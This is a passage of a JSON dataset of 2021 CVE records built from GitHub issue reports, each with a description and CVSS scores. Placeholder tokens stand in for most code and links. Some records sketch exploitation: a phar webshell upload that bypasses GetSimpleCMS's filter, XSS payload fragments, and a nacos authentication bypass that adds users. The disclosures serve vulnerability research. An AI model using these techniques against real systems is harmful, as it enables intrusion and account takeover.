  64930. "description": "Heap buffer overflow in APITAG . URLTAG At line NUMBERTAG the guard object's APITAG field is incremented by the value returned from a read implementation. If a questionable Read returns a value larger than the buffer size, it will take that value and set the length of the vector over the boundary. This bug is reachable from APITAG and APITAG . Here is a playground link URLTAG that demonstrates the bug. It segfaults with APITAG .",
  64931. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64932. "severity": "HIGH",
  64933. "baseScore": 7.5,
  64934. "impactScore": 3.6,
  64935. "exploitabilityScore": 3.9
  64936. },
  64937. {
  64938. "CVE_ID": "CVE-2021-28876",
  64939. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/81740",
  64940. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/81740",
  64941. "Repo_new": "rust-lang/rust",
  64942. "Issue_Created_At": "2021-02-04T06:49:38Z",
  64943. "description": "Soundness issue in APITAG specialization. URLTAG URLTAG There is a panic safety issue in APITAG that allows to call ERRORTAG to the same index twice. ERRORTAG is called at line NUMBERTAG and the index is updated at line NUMBERTAG If line NUMBERTAG panics, the index is not updated and the subsequent APITAG call will use the same index for ERRORTAG . This violates the second safety requirement of APITAG . Here is a playground link URLTAG that demonstrates creating two mutable references to the same memory location without using unsafe Rust.",
  64944. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  64945. "severity": "MEDIUM",
  64946. "baseScore": 5.3,
  64947. "impactScore": 1.4,
  64948. "exploitabilityScore": 3.9
  64949. },
  64950. {
  64951. "CVE_ID": "CVE-2021-28878",
  64952. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/82291",
  64953. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/82291",
  64954. "Repo_new": "rust-lang/rust",
  64955. "Issue_Created_At": "2021-02-19T14:23:14Z",
  64956. "description": "Zip may call __iterator_get_unchecked twice with the same index. Here ERRORTAG is called for potential side effects until APITAG , ignoring however that it could have already been called in APITAG with those indexes. URLTAG Playground link URLTAG that demonstrates how this can be exploited to get two mutable references to the same data and cause an use after free bug.",
  64957. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64958. "severity": "HIGH",
  64959. "baseScore": 7.5,
  64960. "impactScore": 3.6,
  64961. "exploitabilityScore": 3.9
  64962. },
  64963. {
  64964. "CVE_ID": "CVE-2021-28879",
  64965. "Issue_Url_old": "https://github.com/rust-lang/rust/issues/82282",
  64966. "Issue_Url_new": "https://github.com/rust-lang/rust/issues/82282",
  64967. "Repo_new": "rust-lang/rust",
  64968. "Issue_Created_At": "2021-02-19T03:43:41Z",
  64969. "description": "Side effect handling in specialized zip implementation causes buffer overflow. URLTAG URLTAG APITAG can be set to a value greater than APITAG in this branch. This causes integer overflow in APITAG and lead to a buffer overflow. Playground Link URLTAG that demonstrates segfault with safe Rust code.",
  64970. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  64971. "severity": "CRITICAL",
  64972. "baseScore": 9.8,
  64973. "impactScore": 5.9,
  64974. "exploitabilityScore": 3.9
  64975. },
  64976. {
  64977. "CVE_ID": "CVE-2021-28902",
  64978. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1454",
  64979. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1454",
  64980. "Repo_new": "cesnet/libyang",
  64981. "Issue_Created_At": "2021-03-08T11:34:27Z",
  64982. "description": "In function \"read_yin_container\", the value \"retval >ext[r]\" can be NULL. The operation \"retval >ext[r] >flags\" result in a crash. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG Krejesne APITAG APITAG APITAG tion> APITAG APITAG APITAG APITAG :rre instance value=\"false\"/> APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  64983. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64984. "severity": "HIGH",
  64985. "baseScore": 7.5,
  64986. "impactScore": 3.6,
  64987. "exploitabilityScore": 3.9
  64988. },
  64989. {
  64990. "CVE_ID": "CVE-2021-28903",
  64991. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1453",
  64992. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1453",
  64993. "Repo_new": "cesnet/libyang",
  64994. "Issue_Created_At": "2021-03-08T07:25:01Z",
  64995. "description": "The Recursive call of \"lyxml_parse_elem\" leads to crash.",
  64996. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  64997. "severity": "HIGH",
  64998. "baseScore": 7.5,
  64999. "impactScore": 3.6,
  65000. "exploitabilityScore": 3.9
  65001. },
  65002. {
  65003. "CVE_ID": "CVE-2021-28904",
  65004. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1451",
  65005. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1451",
  65006. "Repo_new": "cesnet/libyang",
  65007. "Issue_Created_At": "2021-03-08T02:03:57Z",
  65008. "description": "\u201cext_get_plugin\u201d function cause crash. The argument \"revision\" of function ext_get_plugin can be NULL, which can cause crash in the strcmp.",
  65009. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65010. "severity": "HIGH",
  65011. "baseScore": 7.5,
  65012. "impactScore": 3.6,
  65013. "exploitabilityScore": 3.9
  65014. },
  65015. {
  65016. "CVE_ID": "CVE-2021-28905",
  65017. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1452",
  65018. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1452",
  65019. "Repo_new": "cesnet/libyang",
  65020. "Issue_Created_At": "2021-03-08T03:16:06Z",
  65021. "description": "\u201clys_node_free\u201d function's arg node >module can be NULL, which lead to assert.. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG revision. APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
  65022. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65023. "severity": "HIGH",
  65024. "baseScore": 7.5,
  65025. "impactScore": 3.6,
  65026. "exploitabilityScore": 3.9
  65027. },
  65028. {
  65029. "CVE_ID": "CVE-2021-28906",
  65030. "Issue_Url_old": "https://github.com/CESNET/libyang/issues/1455",
  65031. "Issue_Url_new": "https://github.com/cesnet/libyang/issues/1455",
  65032. "Repo_new": "cesnet/libyang",
  65033. "Issue_Created_At": "2021-03-08T11:35:21Z",
  65034. "description": "In function \"read_yin_leaf\", the value \"retval >ext[r]\" can be NULL. The operation \"retval >ext[r] >flags\" result in a crash . CODETAG",
  65035. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65036. "severity": "HIGH",
  65037. "baseScore": 7.5,
  65038. "impactScore": 3.6,
  65039. "exploitabilityScore": 3.9
  65040. },
  65041. {
  65042. "CVE_ID": "CVE-2021-28976",
  65043. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1335",
  65044. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1335",
  65045. "Repo_new": "getsimplecms/getsimplecms",
  65046. "Issue_Created_At": "2021-03-19T12:47:58Z",
  65047. "description": "Before APITAG NUMBERTAG ersion FILETAG allowed to upload executable files lead to RCE. Affected version: APITAG before NUMBERTAG ulnerable file: FILETAG . Causes of vulnerability : FILETAG does not allow direct uploading of ph type files, and it fails when directly uploading ph files. FILETAG However, you can bypass the detection by uploading a phar file and adding picture file header information such as jpg to the file to successfully upload the phar file. FILETAG Because the phar file can be parsed normally after php NUMBERTAG you can directly upload the php webshell with the phar suffix. FILETAG Repair suggestion: add the ph file to the upload blacklist",
  65048. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  65049. "severity": "HIGH",
  65050. "baseScore": 7.2,
  65051. "impactScore": 5.9,
  65052. "exploitabilityScore": 1.2
  65053. },
  65054. {
  65055. "CVE_ID": "CVE-2021-28977",
  65056. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1336",
  65057. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1336",
  65058. "Repo_new": "getsimplecms/getsimplecms",
  65059. "Issue_Created_At": "2021-03-19T13:39:08Z",
  65060. "description": "Cross Site Scripting(XSS) Vulnerability via upload in Latest Release NUMBERTAG FILETAG . Affected version : APITAG before NUMBERTAG ulnerable file : FILETAG . Vulnerability type : Cross Site Scripting(XSS) The file content filtering in FILETAG is not comprehensive. Adding comments or jpg and other file header information in the file content can lead to the successful upload of files such as xla, pages, gzip, etc. that contain HTML code. If an attacker adds malicious js scripts to the HTML code, it may trigger cross site scripting (XSS) vulnerabilities and threaten user information. FILETAG FILETAG FILETAG FILETAG Repair suggestion: Filter sensitive characters in uploaded files, such as APITAG , etc.",
  65061. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65062. "severity": "MEDIUM",
  65063. "baseScore": 4.8,
  65064. "impactScore": 2.7,
  65065. "exploitabilityScore": 1.7
  65066. },
  65067. {
  65068. "CVE_ID": "CVE-2021-29002",
  65069. "Issue_Url_old": "https://github.com/plone/Products.CMFPlone/issues/3255",
  65070. "Issue_Url_new": "https://github.com/plone/products.cmfplone/issues/3255",
  65071. "Repo_new": "plone/products.cmfplone",
  65072. "Issue_Created_At": "2021-03-03T07:13:08Z",
  65073. "description": "Stored XSS in APITAG field. Hi Team, Description: Stored XSS, also known as persistent XSS, is more damaging than non persistent XSS. It occurs when a malicious script is injected directly into a vulnerable web application. Vulnerable Parameter: APITAG Affected version NUMBERTAG SS payload: APITAG APITAG Steps to reproduce the issue NUMBERTAG Goto FILETAG where Plone NUMBERTAG ersion is installed NUMBERTAG Click on APITAG in now\" and Login as APITAG NUMBERTAG Navigate to APITAG APITAG NUMBERTAG Edit APITAG title\" field to APITAG APITAG \" Video POC: URLTAG Impact: XSS can use to steal cookies, password or to run arbitrary code on a victim's browser Reference: URLTAG URLTAG URLTAG Regards, Piyush Patil",
  65074. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  65075. "severity": "MEDIUM",
  65076. "baseScore": 5.4,
  65077. "impactScore": 2.7,
  65078. "exploitabilityScore": 2.3
  65079. },
  65080. {
  65081. "CVE_ID": "CVE-2021-29008",
  65082. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/211",
  65083. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/211",
  65084. "Repo_new": "seopanel/seo-panel",
  65085. "Issue_Created_At": "2021-03-19T12:46:12Z",
  65086. "description": "XSS Vulnerability in \"to_time\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the SEO admin login panel version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: to_time ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  65087. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65088. "severity": "MEDIUM",
  65089. "baseScore": 4.8,
  65090. "impactScore": 2.7,
  65091. "exploitabilityScore": 1.7
  65092. },
  65093. {
  65094. "CVE_ID": "CVE-2021-29009",
  65095. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/210",
  65096. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/210",
  65097. "Repo_new": "seopanel/seo-panel",
  65098. "Issue_Created_At": "2021-03-19T12:43:40Z",
  65099. "description": "XSS Vulnerability in \"type\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the admin login panel in NUMBERTAG images version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: type ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  65100. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65101. "severity": "MEDIUM",
  65102. "baseScore": 4.8,
  65103. "impactScore": 2.7,
  65104. "exploitabilityScore": 1.7
  65105. },
  65106. {
  65107. "CVE_ID": "CVE-2021-29010",
  65108. "Issue_Url_old": "https://github.com/seopanel/Seo-Panel/issues/212",
  65109. "Issue_Url_new": "https://github.com/seopanel/seo-panel/issues/212",
  65110. "Repo_new": "seopanel/seo-panel",
  65111. "Issue_Created_At": "2021-03-19T12:50:19Z",
  65112. "description": "XSS Vulnerability in \"report_type\" parameter. Hi team, I would like to report XSS vulnerability. Description A cross site scripting (XSS) issue in the SEO admin login panel version NUMBERTAG allows remote attackers to inject APITAG via the \"redirect\" parameter. ___ XSS Payload NUMBERTAG autofocus onfocus=alert NUMBERTAG ulnerable parameter: report_type ___ Steps to Reproduce the Issue NUMBERTAG Login to SEO admin panel NUMBERTAG Paste below POC: CODETAG As you can see, XSS is triggered and can send cookies to attacker. ___ Video POC: URLTAG ___ Impact With the help of xss attacker can perform social engineering on users by redirecting them from real website to fake one. Attacker can steal their cookies leading to account takeover and download a malware on their system, and there are many more attacking scenarios a skilled attacker can perform with xss.",
  65113. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65114. "severity": "MEDIUM",
  65115. "baseScore": 4.8,
  65116. "impactScore": 2.7,
  65117. "exploitabilityScore": 1.7
  65118. },
  65119. {
  65120. "CVE_ID": "CVE-2021-29056",
  65121. "Issue_Url_old": "https://github.com/pixelimity/pixelimity/issues/21",
  65122. "Issue_Url_new": "https://github.com/pixelimity/pixelimity/issues/21",
  65123. "Repo_new": "pixelimity/pixelimity",
  65124. "Issue_Created_At": "2021-03-22T08:44:13Z",
  65125. "description": "pixelimity \u2013 Cross Site Scripting (XSS) in APITAG Product: pixelimity Download: URLTAG Vunlerable Version: latest version Tested Version: latest version Author:qianxiao NUMBERTAG Description: Pixelimity CMS is prone to a Persistent Cross Site Scripting attack that allows a malicious user to inject HTML or scripts that can access any cookies, session tokens, or other sensitive information retained by your browser and used with that site. Advisory Details: A Cross Site Scripting (XSS) was discovered in \u201cportfolio latest version\u201d, which can be exploited to execute arbitrary code. The vulnerability exist due to insufficient filtration of user supplied data in the APITAG HTTP POST parameter passed to the PATHTAG URL. An attacker could execute arbitrary HTML and script code in a browser in the context of the vulnerable website. The exploitation example below uses the APITAG APITAG function to see a pop up messagebox: Proof of concept: APITAG as admin. APITAG URL FILETAG and click on APITAG APITAG XSS payload in the APITAG parameter Pixelimity\"> APITAG alert NUMBERTAG APITAG and click on APITAG Setting\" FILETAG FILETAG FILETAG",
  65126. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  65127. "severity": "MEDIUM",
  65128. "baseScore": 4.8,
  65129. "impactScore": 2.7,
  65130. "exploitabilityScore": 1.7
  65131. },
  65132. {
  65133. "CVE_ID": "CVE-2021-29061",
  65134. "Issue_Url_old": "https://github.com/fracpete/vfsjfilechooser2/issues/7",
  65135. "Issue_Url_new": "https://github.com/fracpete/vfsjfilechooser2/issues/7",
  65136. "Repo_new": "fracpete/vfsjfilechooser2",
  65137. "Issue_Created_At": "2020-09-30T14:56:00Z",
  65138. "description": "Vulnerable Regular Expression in vfsjfilechooser2. Type of Issue Potential Regex Denial of Service APITAG Description The vulnerable regular expression is located in URLTAG The APITAG vulnerability can be exploited with the following string APITAG You can execute the following code to reproduce APITAG CODETAG I think you can limit the input length or modify this regex.",
  65139. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  65140. "severity": "HIGH",
  65141. "baseScore": 7.5,
  65142. "impactScore": 3.6,
  65143. "exploitabilityScore": 3.9
  65144. },
  65145. {
  65146. "CVE_ID": "CVE-2021-29272",
  65147. "Issue_Url_old": "https://github.com/microcosm-cc/bluemonday/issues/111",
  65148. "Issue_Url_new": "https://github.com/microcosm-cc/bluemonday/issues/111",
  65149. "Repo_new": "microcosm-cc/bluemonday",
  65150. "Issue_Created_At": "2021-03-27T10:30:00Z",
  65151. "description": "Regression of NUMBERTAG APITAG allows input of SCRIPT tag. Reported by MENTIONTAG at NUMBERTAG T NUMBERTAG I'm a security researcher who has been fuzzing famous XSS sanitizers. > APITAG fuzzing the sanitizers, my fuzzer triggered an alert that shows bluemonday is vulnerable to bypass. > After some checks, I confirmed that this is a vulnerability, so I'm reporting it here. > > While checking the issues on the bluemonday repository, I realized that this is the same issue as URLTAG APITAG must be resolved already as it's closed.) > As there is no doubt this vulnerability occurred again in somewhere of previous commits, I decided to find it. > And it was a commit that added vulnerable code again: URLTAG (It's now moved to here: URLTAG ) > FILETAG > To reproduce this, please use the following steps NUMBERTAG Download the attached FILETAG NUMBERTAG Extract it NUMBERTAG Run test.go: \"go run test.go NUMBERTAG Sanitization bypass will be shown. > > If you are going to fix this issue, please let me know. I can assign CVE to notify this issue to users. > > Best regards, > APITAG",
  65152. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65153. "severity": "MEDIUM",
  65154. "baseScore": 6.1,
  65155. "impactScore": 2.7,
  65156. "exploitabilityScore": 2.8
  65157. },
  65158. {
  65159. "CVE_ID": "CVE-2021-29279",
  65160. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1718",
  65161. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1718",
  65162. "Repo_new": "gpac/gpac",
  65163. "Issue_Created_At": "2021-03-28T14:19:47Z",
  65164. "description": "A integer overflow in function APITAG There is a integer overflow in function APITAG . In which, the arg APITAG \uff0cmaybe value APITAG is a negative number. In result, memcpy in gf_props_assign_value failed. More, this bug may result a heap overflow with crafted file. In command line: FILETAG In gdb: FILETAG The crafted file is in attach zip: FILETAG",
  65165. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65166. "severity": "HIGH",
  65167. "baseScore": 7.8,
  65168. "impactScore": 5.9,
  65169. "exploitabilityScore": 1.8
  65170. },
  65171. {
  65172. "CVE_ID": "CVE-2021-29313",
  65173. "Issue_Url_old": "https://github.com/ciweiin/seacms/issues/14",
  65174. "Issue_Url_new": "https://github.com/ciweiin/seacms/issues/14",
  65175. "Repo_new": "ciweiin/seacms",
  65176. "Issue_Created_At": "2021-03-23T12:55:22Z",
  65177. "description": "seacms NUMBERTAG statcode reflected xss vulnerability . A xss vulnerability was discovered in seacms NUMBERTAG There is a stored XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the v_company and v_tvsparameter of APITAG POC NUMBERTAG APITAG alert NUMBERTAG APITAG CODETAG NUMBERTAG choose this part and write poc to form FILETAG NUMBERTAG submit and view webpage FILETAG FILETAG",
  65178. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  65179. "severity": "MEDIUM",
  65180. "baseScore": 6.1,
  65181. "impactScore": 2.7,
  65182. "exploitabilityScore": 2.8
  65183. },
  65184. {
  65185. "CVE_ID": "CVE-2021-29324",
  65186. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/586",
  65187. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/586",
  65188. "Repo_new": "moddable-opensource/moddable",
  65189. "Issue_Created_At": "2021-02-26T10:34:42Z",
  65190. "description": "stack overflow. Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65191. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65192. "severity": "HIGH",
  65193. "baseScore": 7.8,
  65194. "impactScore": 5.9,
  65195. "exploitabilityScore": 1.8
  65196. },
  65197. {
  65198. "CVE_ID": "CVE-2021-29325",
  65199. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/582",
  65200. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/582",
  65201. "Repo_new": "moddable-opensource/moddable",
  65202. "Issue_Created_At": "2021-02-26T10:30:19Z",
  65203. "description": "heap buffer APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65204. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65205. "severity": "HIGH",
  65206. "baseScore": 7.8,
  65207. "impactScore": 5.9,
  65208. "exploitabilityScore": 1.8
  65209. },
  65210. {
  65211. "CVE_ID": "CVE-2021-29326",
  65212. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/583",
  65213. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/583",
  65214. "Repo_new": "moddable-opensource/moddable",
  65215. "Issue_Created_At": "2021-02-26T10:30:40Z",
  65216. "description": "heap buffer APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65217. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65218. "severity": "HIGH",
  65219. "baseScore": 7.8,
  65220. "impactScore": 5.9,
  65221. "exploitabilityScore": 1.8
  65222. },
  65223. {
  65224. "CVE_ID": "CVE-2021-29327",
  65225. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/580",
  65226. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/580",
  65227. "Repo_new": "moddable-opensource/moddable",
  65228. "Issue_Created_At": "2021-02-26T10:30:01Z",
  65229. "description": "heap buffer APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65230. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65231. "severity": "HIGH",
  65232. "baseScore": 7.8,
  65233. "impactScore": 5.9,
  65234. "exploitabilityScore": 1.8
  65235. },
  65236. {
  65237. "CVE_ID": "CVE-2021-29328",
  65238. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/585",
  65239. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/585",
  65240. "Repo_new": "moddable-opensource/moddable",
  65241. "Issue_Created_At": "2021-02-26T10:32:47Z",
  65242. "description": "over APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65243. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  65244. "severity": "HIGH",
  65245. "baseScore": 7.1,
  65246. "impactScore": 5.2,
  65247. "exploitabilityScore": 1.8
  65248. },
  65249. {
  65250. "CVE_ID": "CVE-2021-29329",
  65251. "Issue_Url_old": "https://github.com/Moddable-OpenSource/moddable/issues/587",
  65252. "Issue_Url_new": "https://github.com/moddable-opensource/moddable/issues/587",
  65253. "Repo_new": "moddable-opensource/moddable",
  65254. "Issue_Created_At": "2021-02-26T10:36:48Z",
  65255. "description": "stack APITAG Enviroment APITAG poc: ERRORTAG description ERRORTAG",
  65256. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  65257. "severity": "HIGH",
  65258. "baseScore": 7.8,
  65259. "impactScore": 5.9,
  65260. "exploitabilityScore": 1.8
  65261. },
  65262. {
  65263. "CVE_ID": "CVE-2021-29338",
  65264. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1338",
  65265. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1338",
  65266. "Repo_new": "uclouvain/openjpeg",
  65267. "Issue_Created_At": "2021-03-24T05:21:26Z",
  65268. "description": "Integer Overflow in num_images. Hello openjpeg2 team, I found an integer overflow vulnerability in the command line options. APITAG If there are many files in the imgdir directory, opj_ The number of files read by compress will overflow. openjpeg2(tested with revision master APITAG run commd APITAG asan info ERRORTAG APITAG When num_images is equal to NUMBERTAG multiplying with OPJ_PATH_LEN will produce an overflow result of NUMBERTAG FILETAG",
  65269. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  65270. "severity": "MEDIUM",
  65271. "baseScore": 5.5,
  65272. "impactScore": 3.6,
  65273. "exploitabilityScore": 1.8
  65274. },
  65275. {
  65276. "CVE_ID": "CVE-2021-29349",
  65277. "Issue_Url_old": "https://github.com/0xBaz/CVE-2021-29349/issues/1",
  65278. "Issue_Url_new": "https://github.com/0xbaz/cve-2021-29349/issues/1",
  65279. "Repo_new": "0xbaz/cve-2021-29349",
  65280. "Issue_Created_At": "2021-03-31T20:04:33Z",
  65281. "description": "CVETAG . Hi, Product : Mahara NUMBERTAG Website : FILETAG Login Details : APITAG Description : Cross Site Request Forgery (CSRF) that allows a remote attacker to remove inbox mail on the server. The application fails to validate the CSRF token for a POST request. An attacker can craft the FILETAG directory, which leads to removing all messages from a mailbox. Video POC : Google Drive Video URLTAG POC : CODETAG Recommendations NUMBERTAG Implement X CSRF TOKEN and make sure it's validating in back end server as well NUMBERTAG Implement an interceptor which appends token value to every (state changing) request in custom request header APITAG",
  65282. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  65283. "severity": "MEDIUM",
  65284. "baseScore": 6.5,
  65285. "impactScore": 3.6,
  65286. "exploitabilityScore": 2.8
  65287. },
  65288. {
  65289. "CVE_ID": "CVE-2021-29441",
  65290. "Issue_Url_old": "https://github.com/alibaba/nacos/issues/4701",
  65291. "Issue_Url_new": "https://github.com/alibaba/nacos/issues/4701",
  65292. "Repo_new": "alibaba/nacos",
  65293. "Issue_Created_At": "2021-01-14T09:52:31Z",
  65294. "description": "Report a security vulnerability in nacos to bypass authentication(identity) again. english Hello, I\u2019m threedr3am. I found that the latest version NUMBERTAG of nacos still has a bypass problem for the APITAG key value repair mechanism that bypasses security vulnerabilities in User Agent. The custom key value authentication of APITAG is enabled in nacos. Later, through the special url structure, it is still possible to bypass the restriction to access any http interface. By viewing this function, you need to add the configuration APITAG in APITAG to avoid the ERRORTAG POST URLTAG CODETAG APITAG APITAG APITAG public class APITAG implements Filter { MENTIONTAG private APITAG APITAG MENTIONTAG private APITAG APITAG MENTIONTAG private APITAG APITAG private APITAG extends APITAG APITAG APITAG = new APITAG MENTIONTAG public void APITAG request, APITAG response, APITAG chain) throws ERRORTAG ERRORTAG { if APITAG { APITAG response); return; } APITAG req = APITAG request; APITAG resp = APITAG response; if APITAG { String APITAG = APITAG if APITAG APITAG { APITAG response); return; } } else if APITAG && APITAG APITAG { String APITAG = APITAG if APITAG { APITAG response); return; } APITAG server identity value for {} from {}\", APITAG APITAG } else { ERRORTAG APITAG server identity key or value, Please make sure set APITAG \" + \" and APITAG , or open APITAG \"); return; } try { Method method = APITAG if (method == null) { APITAG response); return; } ...\u9274\u6743\u4ee3\u7801 } ... } ... } APITAG APITAG APITAG User Agent: Nacos Server CODETAG '' in APITAG the simple key value authentication mechanism is turned on Then, it will get a value from the http header according to the APITAG configured by the developer, and then go to the APITAG is matched, if it does not match, it will not enter the branch execution: APITAG But the problem is precisely here. The logic here should be to directly return denied access when there is a mismatch, but in fact we did not do this, which allows us to bypass the provision of conditions later. Looking further down, the code comes to: CODETAG As you can see, there is a judgment APITAG , as long as this condition is met, the subsequent authentication code will not go to. By looking at the APITAG code implementation, I found a method that can make the returned method null APITAG APITAG ERRORTAG ERRORTAG In this code, you can clearly see that the return of the method value depends on CODETAG The key of APITAG whether the mapping value can be obtained from APITAG of APITAG In the composition of APITAG there is a part of path, and there is a problem with the generation of this part. It is obtained in the following way: APITAG A normal visit, such as APITAG , the path obtained will be APITAG , and through a specially constructed URL, such as APITAG , the path will be APITAG In this way, the path will be able to control the trailing slash'/', resulting in the method cannot be obtained from the APITAG APITAG why? Because basically all APITAG in nacos do not end with a slash'/', only The APITAG at the end of the non slanted bar'/' exists and is stored in the APITAG of APITAG then the outermost APITAG condition will be satisfied, thus bypassing the authentication mechanism NUMBERTAG The scope of the vulnerability Sphere of influence NUMBERTAG loopholes reproduce NUMBERTAG Access user list interface APITAG As you can see, the authentication is bypassed and the user list data is returned CODETAG NUMBERTAG Add new user APITAG As you can see, authentication has been bypassed and new users have been added APITAG NUMBERTAG iew user list again APITAG As you can see, in the returned user list data, there is one more user we created by bypassing authentication. CODETAG NUMBERTAG isit the homepage APITAG , log in to the new account, and you can do anything \u4e2d\u6587 APITAG APITAG key APITAG APITAG APITAG APITAG \uff0c\u624d\u80fd\u907f\u514d APITAG \u7ed5\u8fc7\u9274\u6743\u7684\u5b89\u5168\u95ee\u9898\u3002 APITAG \u8c03\u7528\u6dfb\u52a0\u7528\u6237\u63a5\u53e3\uff0c\u6dfb\u52a0\u65b0\u7528\u6237\uff08 APITAG APITAG \u4e00\u3001\u6f0f\u6d1e\u8be6\u60c5 \u95ee\u9898\u4e3b\u8981\u51fa\u73b0\u5728 APITAG : ERRORTAG 